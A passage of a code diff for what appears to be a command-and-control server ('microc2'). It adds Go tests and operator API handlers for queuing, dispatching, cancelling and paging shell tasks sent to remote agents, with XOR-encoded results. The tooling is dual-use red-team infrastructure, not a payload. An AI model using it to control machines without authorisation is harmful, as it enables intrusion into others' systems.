+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusConflict {
+		t.Fatalf("expected dispatched result transition 409, got %d: %s", rec.Code, rec.Body.String())
+	}
+}
+
+func TestHTTPPollingProtocolLegacyPollSkipsTypedOriginTasks(t *testing.T) {
+	proto := NewHTTPPollingProtocol(common.BaseProtocolConfig{UploadDir: t.TempDir(), Port: "0"})
+	handler := proto.GetHTTPHandler()
+	expiresIn := 300
+	typed, err := proto.CreateTask("agent-one", tasks.CreateRequest{
+		SchemaVersion:    tasks.SchemaVersion,
+		Type:             tasks.TypeShell,
+		Arguments:        tasks.ShellArguments{Command: "typed-only"},
+		TimeoutSeconds:   30,
+		ExpiresInSeconds: &expiresIn,
+	})
+	if err != nil {
+		t.Fatalf("create typed task: %v", err)
+	}
+
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(http.MethodGet, "/api/agent/agent-one/command", nil)
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusNoContent {
+		t.Fatalf("legacy poll consumed typed-origin task: %d: %s", rec.Code, rec.Body.String())
+	}
+
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(http.MethodGet, "/api/agent/agent-one/tasks", nil)
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("typed poll did not receive typed task: %d: %s", rec.Code, rec.Body.String())
+	}
+	var dispatched tasks.Task
+	if err := json.Unmarshal(rec.Body.Bytes(), &dispatched); err != nil {
+		t.Fatalf("decode typed task: %v", err)
+	}
+	if dispatched.ID != typed.ID {
+		t.Fatalf("typed poll received task %q, want %q", dispatched.ID, typed.ID)
+	}
+}
+
+func TestHTTPPollingProtocolTypedCompletionProjectsLegacyHistoryOnce(t *testing.T) {
+	proto := NewHTTPPollingProtocol(common.BaseProtocolConfig{UploadDir: t.TempDir(), Port: "0"})
+	handler := proto.GetHTTPHandler()
+	legacy, err := proto.QueueLegacyShellTask("agent-one", "whoami")
+	if err != nil {
+		t.Fatalf("queue legacy task: %v", err)
+	}
+
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(http.MethodGet, "/api/agent/agent-one/tasks", nil)
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("dispatch legacy-origin task through typed API: %d: %s", rec.Code, rec.Body.String())
+	}
+	var dispatched tasks.Task
+	if err := json.Unmarshal(rec.Body.Bytes(), &dispatched); err != nil {
+		t.Fatalf("decode dispatched task: %v", err)
+	}
+	if dispatched.ID != legacy.ID {
+		t.Fatalf("dispatched task %q, want %q", dispatched.ID, legacy.ID)
+	}
+
+	agentStartedAt := dispatched.DispatchedAt.Add(time.Second)
+	statusBody, err := json.Marshal(tasks.StatusUpdate{
+		SchemaVersion: tasks.SchemaVersion,
+		TaskID:        legacy.ID,
+		AgentID:       "agent-one",
+		Status:        tasks.StatusRunning,
+		Timestamp:     agentStartedAt,
+	})
+	if err != nil {
+		t.Fatalf("marshal running update: %v", err)
+	}
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(
+		http.MethodPost,
+		"/api/agent/agent-one/tasks/"+legacy.ID+"/status",
+		bytes.NewReader(statusBody),
+	)
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("mark legacy-origin task running: %d: %s", rec.Code, rec.Body.String())
+	}
+
+	exitCode := 0
+	resultBody, err := json.Marshal(tasks.Result{
+		SchemaVersion: tasks.SchemaVersion,
+		TaskID:        legacy.ID,
+		AgentID:       "agent-one",
+		Outcome:       tasks.OutcomeCompleted,
+		StartedAt:     agentStartedAt,
+		CompletedAt:   agentStartedAt.Add(time.Second),
+		ExitCode:      &exitCode,
+		Output:        tasks.Output{Stdout: "operator\n", Stderr: ""},
+	})
+	if err != nil {
+		t.Fatalf("marshal typed result: %v", err)
+	}
+	for attempt := 1; attempt <= 2; attempt++ {
+		rec = httptest.NewRecorder()
+		req = httptest.NewRequest(
+			http.MethodPost,
+			"/api/agent/agent-one/results",
+			bytes.NewReader(resultBody),
+		)
+		handler.ServeHTTP(rec, req)
+		if rec.Code != http.StatusOK {
+			t.Fatalf("typed result attempt %d: %d: %s", attempt, rec.Code, rec.Body.String())
+		}
+	}
+
+	results := proto.GetResults("agent-one")
+	if len(results) != 1 {
+		t.Fatalf("idempotent typed completion projected %d legacy results, want 1", len(results))
+	}
+	if results[0]["command"] != "whoami" || results[0]["output"] != "operator\n" {
+		t.Fatalf("unexpected projected legacy result: %#v", results[0])
+	}
+}
+
+func TestHTTPPollingProtocolLegacyErrorIsFailedTypedHistory(t *testing.T) {
+	proto := NewHTTPPollingProtocol(common.BaseProtocolConfig{UploadDir: t.TempDir(), Port: "0"})
+	handler := proto.GetHTTPHandler()
+	proto.QueueCommand("agent-one", "whoami")
+
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(http.MethodGet, "/api/agent/agent-one/command", nil)
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("dispatch legacy command: %d: %s", rec.Code, rec.Body.String())
+	}
+
+	postListenerResult(t, handler, "agent-one", "whoami", xorHex("Error: timed out", "agent-one"))
+	history, err := proto.ListTasks("agent-one")
+	if err != nil {
+		t.Fatalf("list typed history: %v", err)
+	}
+	if len(history) != 1 ||
+		history[0].Status != tasks.StatusFailed ||
+		history[0].Result == nil ||
+		history[0].Result.Outcome != tasks.OutcomeFailed ||
+		history[0].Result.ExitCode != nil ||
+		history[0].Result.Error != "Error: timed out" {
+		t.Fatalf("legacy error was not preserved as a failed typed task: %#v", history)
+	}
+}
+
+func TestHTTPPollingProtocolRejectsOversizedTaskUpdateBody(t *testing.T) {
+	proto := NewHTTPPollingProtocol(common.BaseProtocolConfig{UploadDir: t.TempDir(), Port: "0"})
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(
+		http.MethodPost,
+		"/api/agent/agent-one/tasks/task-one/status",
+		bytes.NewBufferString(
+			`{"schema_version":1,"task_id":"task-one","agent_id":"agent-one",`+
+				`"status":"running","timestamp":"`+
+				strings.Repeat("x", int(tasks.MaxStatusUpdateBodyBytes)+1)+`"}`,
+		),
+	)
+	proto.GetHTTPHandler().ServeHTTP(rec, req)
+	if rec.Code != http.StatusRequestEntityTooLarge {
+		t.Fatalf("expected oversized status update 413, got %d: %s", rec.Code, rec.Body.String())
+	}
+}
+
+func TestHTTPPollingProtocolAcceptsWorstCaseValidResultBody(t *testing.T) {
+	proto := NewHTTPPollingProtocol(common.BaseProtocolConfig{UploadDir: t.TempDir(), Port: "0"})
+	handler := proto.GetHTTPHandler()
+	expiresIn := 300
+	task, err := proto.CreateTask("agent-one", tasks.CreateRequest{
+		SchemaVersion:    tasks.SchemaVersion,
+		Type:             tasks.TypeShell,
+		Arguments:        tasks.ShellArguments{Command: "emit-astral-characters"},
+		TimeoutSeconds:   30,
+		ExpiresInSeconds: &expiresIn,
+	})
+	if err != nil {
+		t.Fatalf("create typed task: %v", err)
+	}
+
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(http.MethodGet, "/api/agent/agent-one/tasks", nil)
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("dispatch typed task: %d: %s", rec.Code, rec.Body.String())
+	}
+	var dispatched tasks.Task
+	if err := json.Unmarshal(rec.Body.Bytes(), &dispatched); err != nil {
+		t.Fatalf("decode dispatched task: %v", err)
+	}
+	startedAt := dispatched.DispatchedAt.Add(time.Second)
+	statusBody, err := json.Marshal(tasks.StatusUpdate{
+		SchemaVersion: tasks.SchemaVersion,
+		TaskID:        task.ID,
+		AgentID:       task.AgentID,
+		Status:        tasks.StatusRunning,
+		Timestamp:     startedAt,
+	})
+	if err != nil {
+		t.Fatalf("marshal running update: %v", err)
+	}
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(
+		http.MethodPost,
+		"/api/agent/agent-one/tasks/"+task.ID+"/status",
+		bytes.NewReader(statusBody),
+	)
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("mark task running: %d: %s", rec.Code, rec.Body.String())
+	}
+
+	exitCode := 0
+	const astralSentinel = "😀"
+	resultBody, err := json.Marshal(tasks.Result{
+		SchemaVersion: tasks.SchemaVersion,
+		TaskID:        task.ID,
+		AgentID:       task.AgentID,
+		Outcome:       tasks.OutcomeCompleted,
+		StartedAt:     startedAt,
+		CompletedAt:   startedAt.Add(time.Second),
+		ExitCode:      &exitCode,
+		Output: tasks.Output{
+			Stdout: astralSentinel,
+			Stderr: astralSentinel,
+		},
+	})
+	if err != nil {
+		t.Fatalf("marshal astral result template: %v", err)
+	}
+	surrogateEscapedStream := strings.Repeat(`\ud83d\ude00`, tasks.MaxResultStreamCharacters)
+	resultBody = bytes.ReplaceAll(
+		resultBody,
+		[]byte(astralSentinel),
+		[]byte(surrogateEscapedStream),
+	)
+	if len(resultBody) <= 16<<20 {
+		t.Fatalf(
+			"regression body is %d bytes; must exceed the old 16 MiB cap",
+			len(resultBody),
+		)
+	}
+	if len(resultBody) > int(tasks.MaxTaskResultBodyBytes) {
+		t.Fatalf(
+			"schema-valid result is %d bytes; exceeds current %d-byte cap",
+			len(resultBody),
+			tasks.MaxTaskResultBodyBytes,
+		)
+	}
+
+	rec = httptest.NewRecorder()
+	req = httptest.NewRequest(
+		http.MethodPost,
+		"/api/agent/agent-one/results",
+		bytes.NewReader(resultBody),
+	)
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("schema-valid result body rejected: %d: %s", rec.Code, rec.Body.String())
+	}
+}
+
 func TestHTTPPollingProtocolIsolatesMultipleAgentsPerListener(t *testing.T) {
 	proto := NewHTTPPollingProtocol(common.BaseProtocolConfig{
 		UploadDir: t.TempDir(),
@@ -140,6 +560,35 @@ func TestHTTPPollingProtocolIsolatesMultipleAgentsPerListener(t *testing.T) {
 	}
 	if len(agentTwoResults) != 1 || agentTwoResults[0]["output"] != "two\n" {
 		t.Fatalf("unexpected agent-two results: %#v", agentTwoResults)
+	}
+}
+
+func TestHTTPPollingProtocolPagesLegacyResultsAndReportsTotal(t *testing.T) {
+	proto := NewHTTPPollingProtocol(common.BaseProtocolConfig{
+		UploadDir: t.TempDir(),
+		Port:      "0",
+	})
+	for i := 0; i < 125; i++ {
+		proto.recordLegacyResultForAgent("agent-one", CommandResult{
+			Command:   fmt.Sprintf("command-%03d", i),
+			Output:    fmt.Sprintf("output-%03d", i),
+			Timestamp: "2026-07-23T16:30:00Z",
+		})
+	}
+
+	page, total := proto.GetResultsPage("agent-one", 50, 25)
+	if total != 125 {
+		t.Fatalf("legacy result total = %d, want 125", total)
+	}
+	if len(page) != 25 ||
+		page[0]["command"] != "command-050" ||
+		page[24]["command"] != "command-074" {
+		t.Fatalf("unexpected legacy result page: %#v", page)
+	}
+
+	page, total = proto.GetResultsPage("agent-one", 200, 25)
+	if total != 125 || page == nil || len(page) != 0 {
+		t.Fatalf("beyond-end legacy result page = %#v, total %d; want [] and 125", page, total)
 	}
 }
 

--- a/server/internal/handlers/api/api_handler.go
+++ b/server/internal/handlers/api/api_handler.go
@@ -2,13 +2,22 @@ package api
 
 import (
 	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
 	"log" // Updated from `networking`
+	"net/http"
+	"net/url"
+	"sort"
+	"strconv"
+	"strings"
+	"time"
 
 	// Updated from `networking`
 
+	"microc2/server/internal/listeners"
+	"microc2/server/internal/tasks"
 	"microc2/server/pkg/communication"
-	"net/http"
-	"strings"
 )
 
 func NewAPIHandler(manager *communication.ServerManager) *APIHandler {
@@ -26,6 +35,23 @@ func (h *APIHandler) HandleRequest(w http.ResponseWriter, r *http.Request) {
 
 	if r.Method == http.MethodPost && r.URL.Path == "/api/agents/command" {
 		h.handleQueueAgentCommandFromBody(w, r)
+		return
+	}
+
+	if matched, valid, agentID, taskID, cancel := parseOperatorTaskRoute(r.URL.Path); matched {
+		if !valid {
+			http.Error(w, "Invalid task request path", http.StatusBadRequest)
+			return
+		}
+		if cancel {
+			h.handleCancelTask(w, r, agentID, taskID)
+			return
+		}
+		if taskID != "" {
+			h.handleTaskDetail(w, r, agentID, taskID)
+			return
+		}
+		h.handleTasks(w, r, agentID)
 		return
 	}
 
@@ -47,7 +73,7 @@ func (h *APIHandler) HandleRequest(w http.ResponseWriter, r *http.Request) {
 			http.Error(w, "Invalid agent ID", http.StatusBadRequest)
 			return
 		}
-		h.handleGetAgentResults(w, AgentID)
+		h.handleGetAgentResults(w, r, AgentID)
 		return
 	}
 
@@ -61,10 +87,414 @@ func parseAgentPathID(path, prefix, suffix string) (string, bool) {
 	trimmed := strings.TrimPrefix(path, prefix)
 	agentID := strings.TrimSuffix(trimmed, suffix)
 	agentID = strings.TrimSuffix(agentID, "/")
-	if agentID == "" || strings.Contains(agentID, "/") {
+	if strings.Contains(agentID, "/") || tasks.ValidateIdentifier("agent_id", agentID) != nil {
 		return "", false
 	}
 	return agentID, true
+}
+
+func parseOperatorTaskRoute(path string) (matched, valid bool, agentID, taskID string, cancel bool) {
+	parts := strings.Split(strings.Trim(path, "/"), "/")
+	if len(parts) < 4 || parts[0] != "api" || parts[1] != "agents" || parts[3] != "tasks" {
+		return false, false, "", "", false
+	}
+	if err := tasks.ValidateIdentifier("agent_id", parts[2]); err != nil {
+		return true, false, "", "", false
+	}
+	switch {
+	case len(parts) == 4:
+		return true, true, parts[2], "", false
+	case len(parts) == 5:
+		if err := tasks.ValidateIdentifier("task_id", parts[4]); err != nil {
+			return true, false, "", "", false
+		}
+		return true, true, parts[2], parts[4], false
+	case len(parts) == 6 && parts[5] == "cancel":
+		if err := tasks.ValidateIdentifier("task_id", parts[4]); err != nil {
+			return true, false, "", "", false
+		}
+		return true, true, parts[2], parts[4], true
+	default:
+		return true, false, "", "", false
+	}
+}
+
+type taskProtocol interface {
+	CreateTask(agentID string, request tasks.CreateRequest) (tasks.Task, error)
+	ListTasks(agentID string) ([]tasks.Task, error)
+	CancelTask(agentID, taskID string) (tasks.Task, error)
+	GetTask(agentID, taskID string) (tasks.Task, error)
+	GetResultsPage(agentID string, offset, limit int) ([]map[string]interface{}, int)
+	QueueLegacyShellTask(agentID, command string) (tasks.Task, error)
+	AgentLastSeen(agentID string) (time.Time, bool)
+}
+
+const (
+	defaultTaskListLimit          = 50
+	maxTaskListLimit              = 100
+	maxLegacyResultsPageBodyBytes = 16 << 20
+)
+
+type taskListOptions struct {
+	limit  int
+	offset int
+}
+
+type taskListEnvelope struct {
+	SchemaVersion int                 `json:"schema_version"`
+	Tasks         []tasks.TaskSummary `json:"tasks"`
+	Limit         int                 `json:"limit"`
+	Offset        int                 `json:"offset"`
+	Total         int                 `json:"total"`
+	NextOffset    *int                `json:"next_offset"`
+}
+
+func (h *APIHandler) handleTasks(w http.ResponseWriter, r *http.Request, agentID string) {
+	switch r.Method {
+	case http.MethodPost:
+		if err := rejectTaskQuery(r.URL.RawQuery); err != nil {
+			writeTaskQueryError(w, err)
+			return
+		}
+		protocol, err := h.resolveActiveAgentTaskProtocol(agentID)
+		if err != nil {
+			writeAgentResolutionError(w, err)
+			return
+		}
+		var request tasks.CreateRequest
+		if err := decodeStrictJSON(w, r, &request, tasks.MaxTaskCreateBodyBytes); err != nil {
+			writeJSONDecodeError(w, "Invalid task request", err)
+			return
+		}
+		task, err := protocol.CreateTask(agentID, request)
+		if err != nil {
+			writeTaskError(w, err)
+			return
+		}
+		writeJSON(w, http.StatusAccepted, task)
+	case http.MethodGet:
+		options, err := parseTaskListOptions(r.URL.RawQuery)
+		if err != nil {
+			writeTaskQueryError(w, err)
+			return
+		}
+		agentTasks, err := h.listAgentTasks(agentID)
+		if err != nil {
+			if errors.Is(err, errAgentNotFound) {
+				writeAgentResolutionError(w, err)
+			} else {
+				writeTaskError(w, err)
+			}
+			return
+		}
+		writeJSON(w, http.StatusOK, summarizeTaskPage(agentTasks, options))
+	default:
+		http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
+	}
+}
+
+func (h *APIHandler) handleTaskDetail(
+	w http.ResponseWriter,
+	r *http.Request,
+	agentID string,
+	taskID string,
+) {
+	if r.Method != http.MethodGet {
+		http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
+		return
+	}
+	if err := rejectTaskQuery(r.URL.RawQuery); err != nil {
+		writeTaskQueryError(w, err)
+		return
+	}
+	task, err := h.getAgentTask(agentID, taskID)
+	if err != nil {
+		if errors.Is(err, errAmbiguousTaskOwnership) {
+			writeAgentResolutionError(w, err)
+		} else {
+			writeTaskError(w, err)
+		}
+		return
+	}
+	writeJSON(w, http.StatusOK, task)
+}
+
+func (h *APIHandler) handleCancelTask(w http.ResponseWriter, r *http.Request, agentID, taskID string) {
+	if r.Method != http.MethodPost {
+		http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
+		return
+	}
+	if err := rejectTaskQuery(r.URL.RawQuery); err != nil {
+		writeTaskQueryError(w, err)
+		return
+	}
+	task, err := h.cancelAgentTask(agentID, taskID)
+	if err != nil {
+		if errors.Is(err, errAmbiguousTaskOwnership) {
+			writeAgentResolutionError(w, err)
+		} else {
+			writeTaskError(w, err)
+		}
+		return
+	}
+	writeJSON(w, http.StatusOK, task)
+}
+
+func parseTaskListOptions(rawQuery string) (taskListOptions, error) {
+	options := taskListOptions{
+		limit:  defaultTaskListLimit,
+		offset: 0,
+	}
+	values, err := url.ParseQuery(rawQuery)
+	if err != nil {
+		return taskListOptions{}, fmt.Errorf("malformed query string: %w", err)
+	}
+	keys := make([]string, 0, len(values))
+	for key := range values {
+		keys = append(keys, key)
+	}
+	sort.Strings(keys)
+	for _, key := range keys {
+		if key != "limit" && key != "offset" {
+			return taskListOptions{}, fmt.Errorf("unknown query parameter %q", key)
+		}
+		if len(values[key]) != 1 {
+			return taskListOptions{}, fmt.Errorf(
+				"query parameter %q must be provided exactly once",
+				key,
+			)
+		}
+	}
+	if values.Has("limit") {
+		limit, err := parseTaskQueryInteger("limit", values.Get("limit"))
+		if err != nil {
+			return taskListOptions{}, err
+		}
+		if limit < 1 || limit > maxTaskListLimit {
+			return taskListOptions{}, fmt.Errorf(
+				"query parameter %q must be between 1 and %d",
+				"limit",
+				maxTaskListLimit,
+			)
+		}
+		options.limit = limit
+	}
+	if values.Has("offset") {
+		offset, err := parseTaskQueryInteger("offset", values.Get("offset"))
+		if err != nil {
+			return taskListOptions{}, err
+		}
+		options.offset = offset
+	}
+	return options, nil
+}
+
+func parseTaskQueryInteger(name, value string) (int, error) {
+	if value == "" {
+		return 0, fmt.Errorf("query parameter %q must be a nonnegative integer", name)
+	}
+	for _, character := range value {
+		if character < '0' || character > '9' {
+			return 0, fmt.Errorf("query parameter %q must be a nonnegative integer", name)
+		}
+	}
+	parsed, err := strconv.ParseUint(value, 10, strconv.IntSize)
+	if err != nil {
+		return 0, fmt.Errorf("query parameter %q is out of range", name)
+	}
+	return int(parsed), nil
+}
+
+func rejectTaskQuery(rawQuery string) error {
+	if rawQuery == "" {
+		return nil
+	}
+	values, err := url.ParseQuery(rawQuery)
+	if err != nil {
+		return fmt.Errorf("malformed query string: %w", err)
+	}
+	if len(values) == 0 {
+		return errors.New("query parameters are not supported")
+	}
+	keys := make([]string, 0, len(values))
+	for key := range values {
+		keys = append(keys, key)
+	}
+	sort.Strings(keys)
+	return fmt.Errorf("query parameter %q is not supported", keys[0])
+}
+
+func summarizeTaskPage(all []tasks.Task, options taskListOptions) taskListEnvelope {
+	start := options.offset
+	if start > len(all) {
+		start = len(all)
+	}
+	end := start + options.limit
+	if end > len(all) {
+		end = len(all)
+	}
+	summaries := make([]tasks.TaskSummary, 0, end-start)
+	for _, task := range all[start:end] {
+		summaries = append(summaries, tasks.Summarize(task))
+	}
+	var nextOffset *int
+	if end < len(all) {
+		next := end
+		nextOffset = &next
+	}
+	return taskListEnvelope{
+		SchemaVersion: tasks.SchemaVersion,
+		Tasks:         summaries,
+		Limit:         options.limit,
+		Offset:        options.offset,
+		Total:         len(all),
+		NextOffset:    nextOffset,
+	}
+}
+
+func writeTaskQueryError(w http.ResponseWriter, err error) {
+	http.Error(w, "Invalid task query: "+err.Error(), http.StatusBadRequest)
+}
+
+const activeAgentWindow = 5 * time.Minute
+
+var (
+	errAgentNotFound           = errors.New("agent not found")
+	errAgentInactive           = errors.New("agent has no active listener session")
+	errAmbiguousAgentOwnership = errors.New("agent is active on multiple listeners")
+	errAmbiguousTaskOwnership  = errors.New("task exists on multiple listeners")
+)
+
+type agentTaskProtocolRef struct {
+	listenerID string
+	status     listeners.ListenerStatus
+	protocol   taskProtocol
+	lastSeen   time.Time
+	knownAgent bool
+}
+
+func (h *APIHandler) agentTaskProtocolRefs(agentID string) []agentTaskProtocolRef {
+	if h.serverManager == nil {
+		return nil
+	}
+	refs := make([]agentTaskProtocolRef, 0)
+	for _, listener := range h.serverManager.GetListenerManager().ListListeners() {
+		if listener.Protocol == nil {
+			continue
+		}
+		protocol, ok := listener.Protocol.(taskProtocol)
+		if !ok {
+			continue
+		}
+		lastSeen, knownAgent := protocol.AgentLastSeen(agentID)
+		refs = append(refs, agentTaskProtocolRef{
+			listenerID: listener.Snapshot().Config.ID,
+			status:     listener.GetStatus(),
+			protocol:   protocol,
+			lastSeen:   lastSeen,
+			knownAgent: knownAgent,
+		})
+	}
+	sort.Slice(refs, func(i, j int) bool {
+		return refs[i].listenerID < refs[j].listenerID
+	})
+	return refs
+}
+
+func (h *APIHandler) resolveActiveAgentTaskProtocol(agentID string) (taskProtocol, error) {
+	now := time.Now()
+	var active []taskProtocol
+	knownAgent := false
+	for _, ref := range h.agentTaskProtocolRefs(agentID) {
+		if !ref.knownAgent {
+			continue
+		}
+		knownAgent = true
+		if ref.status != listeners.StatusActive || now.Sub(ref.lastSeen) > activeAgentWindow {
+			continue
+		}
+		active = append(active, ref.protocol)
+	}
+	switch len(active) {
+	case 0:
+		if knownAgent {
+			return nil, errAgentInactive
+		}
+		return nil, errAgentNotFound
+	case 1:
+		return active[0], nil
+	default:
+		return nil, errAmbiguousAgentOwnership
+	}
+}
+
+func (h *APIHandler) listAgentTasks(agentID string) ([]tasks.Task, error) {
+	var combined []tasks.Task
+	knownAgent := false
+	for _, ref := range h.agentTaskProtocolRefs(agentID) {
+		if ref.knownAgent {
+			knownAgent = true
+		}
+		agentTasks, err := ref.protocol.ListTasks(agentID)
+		if err != nil {
+			return nil, err
+		}
+		if len(agentTasks) > 0 {
+			knownAgent = true
+			combined = append(combined, agentTasks...)
+		}
+	}
+	if !knownAgent {
+		return nil, errAgentNotFound
+	}
+	sort.Slice(combined, func(i, j int) bool {
+		if combined[i].CreatedAt.Equal(combined[j].CreatedAt) {
+			return combined[i].ID > combined[j].ID
+		}
+		return combined[i].CreatedAt.After(combined[j].CreatedAt)
+	})
+	return combined, nil
+}
+
+func (h *APIHandler) getAgentTask(agentID, taskID string) (tasks.Task, error) {
+	var found []tasks.Task
+	for _, ref := range h.agentTaskProtocolRefs(agentID) {
+		task, err := ref.protocol.GetTask(agentID, taskID)
+		if err == nil {
+			found = append(found, task)
+			continue
+		}
+		if !errors.Is(err, tasks.ErrNotFound) {
+			return tasks.Task{}, err
+		}
+	}
+	switch len(found) {
+	case 0:
+		return tasks.Task{}, tasks.ErrNotFound
+	case 1:
+		return found[0], nil
+	default:
+		return tasks.Task{}, errAmbiguousTaskOwnership
+	}
+}
+
+func (h *APIHandler) cancelAgentTask(agentID, taskID string) (tasks.Task, error) {
+	var owners []taskProtocol
+	for _, ref := range h.agentTaskProtocolRefs(agentID) {
+		if _, err := ref.protocol.GetTask(agentID, taskID); err == nil {
+			owners = append(owners, ref.protocol)
+		} else if !errors.Is(err, tasks.ErrNotFound) {
+			return tasks.Task{}, err
+		}
+	}
+	switch len(owners) {
+	case 0:
+		return tasks.Task{}, tasks.ErrNotFound
+	case 1:
+		return owners[0].CancelTask(agentID, taskID)
+	default:
+		return tasks.Task{}, errAmbiguousTaskOwnership
+	}
 }
 
 func (h *APIHandler) handleListAgents(w http.ResponseWriter, r *http.Request) {
@@ -86,7 +516,15 @@ type queueCommandRequest struct {
 
 func (h *APIHandler) handleQueueAgentCommandFromBody(w http.ResponseWriter, r *http.Request) {
 	var req queueCommandRequest
-	if err := json.NewDecoder(r.Body).Decode(&req); err != nil || req.AgentID == "" || req.Command == "" {
+	if err := decodeStrictJSON(w, r, &req, tasks.MaxTaskCreateBodyBytes); err != nil {
+		writeJSONDecodeError(w, "Invalid command request", err)
+		return
+	}
+	if err := tasks.ValidateIdentifier("agent_id", req.AgentID); err != nil {
+		writeTaskError(w, err)
+		return
+	}
+	if req.Command == "" {
 		log.Printf("[DEBUG] Invalid command request")
 		http.Error(w, "Invalid command request", http.StatusBadRequest)
 		return
@@ -99,7 +537,11 @@ func (h *APIHandler) handleQueueAgentCommandFromBody(w http.ResponseWriter, r *h
 func (h *APIHandler) handleQueueAgentCommand(w http.ResponseWriter, r *http.Request, AgentID string) {
 	// log.Printf("[DEBUG] handleQueueAgentCommand entered for AgentID=%s", AgentID)
 	var req queueCommandRequest
-	if err := json.NewDecoder(r.Body).Decode(&req); err != nil || req.Command == "" {
+	if err := decodeStrictJSON(w, r, &req, tasks.MaxTaskCreateBodyBytes); err != nil {
+		writeJSONDecodeError(w, "Invalid command", err)
+		return
+	}
+	if req.Command == "" {
 		log.Printf("[DEBUG] Invalid path-based command request")
 		http.Error(w, "Invalid command", http.StatusBadRequest)
 		return
@@ -110,64 +552,275 @@ func (h *APIHandler) handleQueueAgentCommand(w http.ResponseWriter, r *http.Requ
 }
 
 func (h *APIHandler) queueAgentCommandResponse(w http.ResponseWriter, AgentID, command string) {
-	// Find the listener/protocol for this agent
-	listenerMgr := h.serverManager.GetListenerManager()
-	var queued bool
-	for _, listener := range listenerMgr.ListListeners() {
-		if listener.Protocol != nil {
-			if agenter, ok := listener.Protocol.(interface{ GetAllAgents() map[string]interface{} }); ok {
-				agents := agenter.GetAllAgents()
-				// log.Printf("[DEBUG] Listener %s has agents: %v", listener.Config.ID, reflect.ValueOf(agents).MapKeys())
-				if _, exists := agents[AgentID]; exists {
-					if commander, ok := listener.Protocol.(interface {
-						QueueCommand(AgentID, cmd string)
-					}); ok {
-						commander.QueueCommand(AgentID, command)
-						queued = true
-						break
-					}
-				}
-			}
-		}
+	protocol, err := h.resolveActiveAgentTaskProtocol(AgentID)
+	if err != nil {
+		writeAgentResolutionError(w, err)
+		return
+	}
+	task, err := protocol.QueueLegacyShellTask(AgentID, command)
+	if err != nil {
+		writeTaskError(w, err)
+		return
+	}
+	w.Header().Set("Deprecation", "true")
+	writeJSON(w, http.StatusOK, map[string]interface{}{
+		"status":  "queued",
+		"task_id": task.ID,
+	})
+}
+
+type legacyResultPage struct {
+	body       []byte
+	count      int
+	total      int
+	nextOffset *int
+}
+
+// handleGetAgentResults preserves the deprecated bare-array response while
+// bounding both the number of retained results read and the encoded response.
+func (h *APIHandler) handleGetAgentResults(
+	w http.ResponseWriter,
+	r *http.Request,
+	agentID string,
+) {
+	w.Header().Set("Deprecation", "true")
+	w.Header().Set(
+		"Link",
+		fmt.Sprintf("</api/agents/%s/tasks>; rel=\"successor-version\"", agentID),
+	)
+
+	options, err := parseTaskListOptions(r.URL.RawQuery)
+	if err != nil {
+		writeResultQueryError(w, err)
+		return
+	}
+	page, knownAgent, err := h.legacyResultPage(agentID, options)
+	if err != nil {
+		log.Printf("[ERROR] Failed to page legacy results for agent %s: %v", agentID, err)
+		http.Error(w, "Result pagination failed", http.StatusInternalServerError)
+		return
+	}
+	if !knownAgent {
+		http.Error(w, "Agent or results not found", http.StatusNotFound)
+		return
 	}
 
-	// log.Printf("[DEBUG] Command queued for agent %s: %s (queued=%v)", AgentID, command, queued)
-
-	if queued {
-		w.WriteHeader(http.StatusOK)
-		w.Write([]byte(`{"status":"queued"}`))
-	} else {
-		http.Error(w, "Failed to queue command for agent", http.StatusInternalServerError)
+	w.Header().Set("X-Result-Limit", strconv.Itoa(options.limit))
+	w.Header().Set("X-Result-Offset", strconv.Itoa(options.offset))
+	w.Header().Set("X-Result-Count", strconv.Itoa(page.count))
+	w.Header().Set("X-Result-Total", strconv.Itoa(page.total))
+	if page.nextOffset != nil {
+		w.Header().Set("X-Next-Offset", strconv.Itoa(*page.nextOffset))
+	}
+	w.Header().Set("Content-Type", "application/json")
+	w.WriteHeader(http.StatusOK)
+	if _, err := w.Write(page.body); err != nil {
+		log.Printf("[ERROR] Failed to write legacy results response: %v", err)
 	}
 }
 
-// Add handler for agent results
-func (h *APIHandler) handleGetAgentResults(w http.ResponseWriter, AgentID string) {
-	// log.Printf("[DEBUG] handleGetAgentResults called for AgentID=%s", AgentID)
-	listenerMgr := h.serverManager.GetListenerManager()
-	for _, listener := range listenerMgr.ListListeners() {
-		if listener.Protocol != nil {
-			if agenter, ok := listener.Protocol.(interface{ GetAllAgents() map[string]interface{} }); ok {
-				agents := agenter.GetAllAgents()
-				// log.Printf("[DEBUG] Available agent IDs: %v", reflect.ValueOf(agents).MapKeys())
-				if _, exists := agents[AgentID]; exists {
-					if resultGetter, ok := listener.Protocol.(interface {
-						GetResults(AgentID string) []map[string]interface{}
-					}); ok {
-						// Add debug: print keys in results.history
-						// if hp, ok := listener.Protocol.(*behaviour.HTTPPollingProtocol); ok {
-						// keys := hp.GetResultsHistoryKeys()
-						// log.Printf("[DEBUG] Results history keys: %v", keys)
-						// }
-						results := resultGetter.GetResults(AgentID)
-						// log.Printf("[DEBUG] Results for AgentID=%s: %+v", AgentID, results)
-						w.Header().Set("Content-Type", "application/json")
-						json.NewEncoder(w).Encode(results)
-						return
-					}
-				}
-			}
+func (h *APIHandler) legacyResultPage(
+	agentID string,
